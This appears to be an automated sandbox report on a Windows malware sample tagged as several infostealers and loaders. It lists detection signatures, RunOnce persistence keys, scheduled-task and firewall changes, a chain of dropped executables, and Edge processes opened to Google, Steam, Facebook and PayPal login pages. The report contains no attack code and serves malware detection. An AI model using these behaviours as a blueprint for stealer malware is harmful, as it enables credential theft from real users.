Malware Analysis Report

2024-11-13 19:09

Sample ID 231111-1my3aacd86
Target 28d45ae2c91a30136b0599de6252f4e3f0342647a354e40a93a1e259e2fb03c5
SHA256 28d45ae2c91a30136b0599de6252f4e3f0342647a354e40a93a1e259e2fb03c5
Tags
mystic redline smokeloader stealc zgrat taiga up3 backdoor evasion infostealer persistence rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

28d45ae2c91a30136b0599de6252f4e3f0342647a354e40a93a1e259e2fb03c5

Threat Level: Known bad

The file 28d45ae2c91a30136b0599de6252f4e3f0342647a354e40a93a1e259e2fb03c5 was found to be: Known bad.

Malicious Activity Summary

mystic redline smokeloader stealc zgrat taiga up3 backdoor evasion infostealer persistence rat stealer trojan

Detect ZGRat V1

Detect Mystic stealer payload

ZGRat

RedLine payload

Mystic

Stealc

SmokeLoader

RedLine

Downloads MZ/PE file

Stops running service(s)

Modifies Windows Firewall

Executes dropped EXE

Adds Run key to start application

AutoIT Executable

Launches sc.exe

Program crash

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Creates scheduled task(s)

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-11 21:46

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-11 21:46

Reported

2023-11-11 21:49

Platform

win10v2004-20231020-en

Max time kernel

3s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\28d45ae2c91a30136b0599de6252f4e3f0342647a354e40a93a1e259e2fb03c5.exe"

Signatures

Detect Mystic stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Mystic

stealer mystic

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Stealc

stealer stealc

ZGRat

rat zgrat

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\28d45ae2c91a30136b0599de6252f4e3f0342647a354e40a93a1e259e2fb03c5.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\db3Nd93.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xQ2xo09.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Et9eT50.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ns78ZL2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ns78ZL2.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ns78ZL2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ns78ZL2.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2128 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\28d45ae2c91a30136b0599de6252f4e3f0342647a354e40a93a1e259e2fb03c5.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\db3Nd93.exe
PID 2128 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\28d45ae2c91a30136b0599de6252f4e3f0342647a354e40a93a1e259e2fb03c5.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\db3Nd93.exe
PID 2128 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\28d45ae2c91a30136b0599de6252f4e3f0342647a354e40a93a1e259e2fb03c5.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\db3Nd93.exe
PID 4784 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\db3Nd93.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xQ2xo09.exe
PID 4784 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\db3Nd93.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xQ2xo09.exe
PID 4784 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\db3Nd93.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xQ2xo09.exe
PID 2464 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xQ2xo09.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Et9eT50.exe
PID 2464 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xQ2xo09.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Et9eT50.exe
PID 2464 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xQ2xo09.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Et9eT50.exe
PID 2384 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Et9eT50.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ns78ZL2.exe
PID 2384 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Et9eT50.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ns78ZL2.exe
PID 2384 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Et9eT50.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ns78ZL2.exe

Processes

C:\Users\Admin\AppData\Local\Temp\28d45ae2c91a30136b0599de6252f4e3f0342647a354e40a93a1e259e2fb03c5.exe

"C:\Users\Admin\AppData\Local\Temp\28d45ae2c91a30136b0599de6252f4e3f0342647a354e40a93a1e259e2fb03c5.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\db3Nd93.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\db3Nd93.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Et9eT50.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Et9eT50.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ns78ZL2.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ns78ZL2.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xQ2xo09.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xQ2xo09.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff9351e46f8,0x7ff9351e4708,0x7ff9351e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ff9351e46f8,0x7ff9351e4708,0x7ff9351e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff9351e46f8,0x7ff9351e4708,0x7ff9351e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff9351e46f8,0x7ff9351e4708,0x7ff9351e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff9351e46f8,0x7ff9351e4708,0x7ff9351e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x178,0x17c,0x180,0x154,0x184,0x7ff9351e46f8,0x7ff9351e4708,0x7ff9351e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff9351e46f8,0x7ff9351e4708,0x7ff9351e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,16526401488773098777,7359895053744353433,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,16526401488773098777,7359895053744353433,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,10116745818830123095,5917914900614634392,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,10116745818830123095,5917914900614634392,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,14748408987207256869,10661166197367841714,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,14748408987207256869,10661166197367841714,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1544,16001354579516277289,3152199704523021557,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x80,0x170,0x7ff9351e46f8,0x7ff9351e4708,0x7ff9351e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4184 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4188 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4432 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff9351e46f8,0x7ff9351e4708,0x7ff9351e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4708 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4980 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff9351e46f8,0x7ff9351e4708,0x7ff9351e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6284 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4860 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6680 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1972,4740845206289145078,16306961817994451394,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4036 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Pv8082.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Pv8082.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

